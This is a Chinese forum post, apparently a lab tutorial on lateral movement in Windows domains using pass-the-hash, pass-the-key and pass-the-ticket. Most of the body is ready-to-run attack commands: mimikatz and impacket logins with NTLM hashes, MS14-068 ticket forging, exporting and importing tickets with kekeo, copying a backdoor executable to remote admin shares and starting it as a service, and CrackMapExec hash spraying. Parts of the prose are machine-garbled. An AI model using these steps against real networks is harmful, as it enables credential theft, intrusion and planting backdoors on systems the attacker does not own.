论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
安全
›
终端安全
›
【内网安全】横向移动-PTH哈希-PTT票据-PTK密钥 ...
【内网安全】横向移动-PTH哈希-PTT票据-PTK密钥
乌市泽哥
金牌会员
|
2024-8-10 02:02:26
|
显示全部楼层
|
阅读模式
楼主
主题
894
|
帖子
894
|
积分
2682
PTH PTT PTK 简介
pass the hash(哈希传递攻击,简称pth)
pass the ticket(票据传递攻击,简称ptt)
pass the key(密钥传递攻击,简称ptk)
PTH(pass the hash) 利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)
PTK(pass the key) 利用的ekeys aes256进行的渗透测试(NTLM认证攻击)
PTT(pass the ticket) 利用的票据凭证TGT进行渗透测试(Kerberos认证攻击)
复制代码
横向移动前置与情况搭建
看之前的文章 【内网安全】横向移动-Wmi-Smb-CME暗码喷射-CSDN博客
域横向移动-PTH-Mimikatz&NTLM
PTH = Pass The Hash,通过暗码散列值 (通常是NTLM Hash)来举行攻击。
在域情况中,用户登录计算机时利用的域账号,计算时机用相同本地管理员账号和暗码。
因此,如果计算机的本地管理员账号和暗码也是相同的,攻击者就可以利用哈希通报的方法登录到内网主机的其他计算机。另外注意在Window Server 2012 R2之前利用到的暗码散列值是LM、NTLM,在2012 R2及其版本之后利用到的暗码散列值是NTLM Hash。
1、Mimikatz
获取Mimikatz的更高权限,以便后续操作
mimikatz privilege::debug
复制代码
PTK连接32主机,并且会在当前主机弹回一个cmd
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c
复制代码
cs中执行上面的下令
会在执行下令的主机上弹出一个cmd。可以在上面临32主机举行下令执行
上线32主机
连接32主机方便进行文件传输
net use \\192.168.3.32\c$
复制本机的后门到32
copy c:\4455.exe \\192.168.3.32\c$
在32主机创建一个名为‘bshell’的服务,并绑定4455.exe
sc \\sqlserver create ashell binpath= "c:\4455.exe" start=auto #开启自启服务,可以不加
运行服务
sc \\sqlserver start ashell
复制代码
成功上线
此中 192.168.3.32 也可以改成用户名字 如32的用户 sqlserver
这里有个比力严重的问题。当你执行 sc \\sqlserver start ashell 后过一小会就会表现
然后你的cs就掉了
2、impacket-at&ps&wmi&smb
psexec -hashes :NTLM值 域名/域用户@域内ip地址
python psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :NTLM值 域名/域用户@域内ip地址
python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
wmiexec -hashes :NTLM值 域名/域用户@域内ip地址
python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
复制代码
NTLM值可以在CS里面用抓取
域横向移动-PTK-Mimikatz&AES256(鸡肋)
PTK = Pass The Key,当系统
安装了KB2871997补丁且禁用了NTLM
的时间,
那我们抓取到的ntlm hash也就失去了作用,但是可以通过PTK的攻击方式得到权限。
mimikatz sekurlsa::ekeys
mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值
复制代码
域横向移动-PTT-漏洞&Kekeo&Ticket
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/kekeo/releases
1、漏洞-MS14068
(webadmin权限)-利用漏洞天生的用户的新身份票据实验认证
MS14-068是密钥分发中央(KDC)服务中的Windows漏洞。
它允许颠末身份验证的用户在其Kerberos票证(TGT)中插入任意PAC。
该漏洞位于kdcsvc.dll域控制器的密钥分发中央(KDC)中。
用户可以通过呈现具有改变的PAC的Kerberos TGT来得到票证.
获取SID值:
shell whoami/user
复制代码
天生票据文件:
shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45
复制代码
查看当前票据
shell klist
复制代码
清除票据连接:
shell klist
purge
复制代码
内存导入票据:
mimikatz kerberos::ptc TGT_webadmin@god.org.ccache
复制代码
票据是偶然效的
(失效后就连接不上了)
连接目标上线:
这里建议写计算机名,ip可能失效
shell dir \\OWA2010CN-GOD\c$
shell net use \\OWA2010CN-GOD\C$
copy c:\4455.exe \\OWA2010CN-GOD\C$
sc \\OWA2010CN-GOD create bindshell binpath= "c:\4455.exe"
sc \\OWA2010CN-GOD start bindshell
复制代码
注意:成功不成功看DC域控漏洞补丁打没打
2、kekeo 第三方票据天生工具
(高权限,需NTLM)-利用获取的NTLM天生新的票据实验认证
因为当前主机肯定之前与其他主机连接过,以是本地应该天生了一些票据,
我们可以导出这些票据,然后再导入票据,利用。
该方法类似于cookie诱骗
缺点:
票据是有有效期的
,以是如果当前主机在连接过域控的话,有效期内可利用。
天生票据:
shell kekeo "tgt::ask /user:Administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7" "exit"
复制代码
导入票据:
shell kekeo "kerberos::ptt TGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi" "exit"
复制代码
查看票据:
shell klist
复制代码
利用票据连接:
shell dir \\owa2010cn-god\c$
复制代码
注意:因为kekeo只是一个
票据天生工具
,并不是
利用漏洞
,以是能不能连接
成功看ntlm哈希值
的正确性
3、mimikatz
(高权限,需Ticket)-利用历史遗留的票据重新认证实验
导出票据:
mimikatz sekurlsa::tickets /export
复制代码
导入票据:
mimikatz kerberos::ptt C:\Users\webadmin\Desktop\TGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
复制代码
导入与域控连接的票据
查看票据:
shell klist
复制代码
利用票据连接:
shell dir \\owa2010cn-god\c$
复制代码
注意:成功不成功看当前主机
有没有被目标连接过
域横向移动-PTH-Proxychains&CrackMapExec
CrackMapExec
Github:GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks
官方手册:Site Unreachable
下载对应release,建立socks连接,设置socks署理,设置规则利用
1、Linux Proxychains利用
署理设置:
Proxychains.conf
复制代码
署理调用:
Proxychains 命令
复制代码
2、暗码喷射-域用户登录PTH:
域用户HASH登录
proxychains crackmapexec smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c
复制代码
本地用户HASH登录
proxychains crackmapexec smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c
--local-auth
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
乌市泽哥
金牌会员
这个人很懒什么都没写!
楼主热帖
是什么让.NET7的Min和Max方法性能暴增 ...
@RequestParam,@PathVariable两个注解 ...
聚焦企业开放OpenAPI痛难点,华为云API ...
想入行SAP咨询,最具性价比的方式 ...
SqlServer远程连接
7 行代码搞崩溃 B 站,原因令人唏嘘! ...
活动 | 塑造软件新生态 赋能发展新变革 ...
2019 第十届蓝桥杯大赛软件赛决赛,国 ...
CentOS7 安装 Redis 7.0.2
[WPF] 使用 HandyControl 的 CirclePan ...
标签云
挺好的
服务器
快速回复
返回顶部
返回列表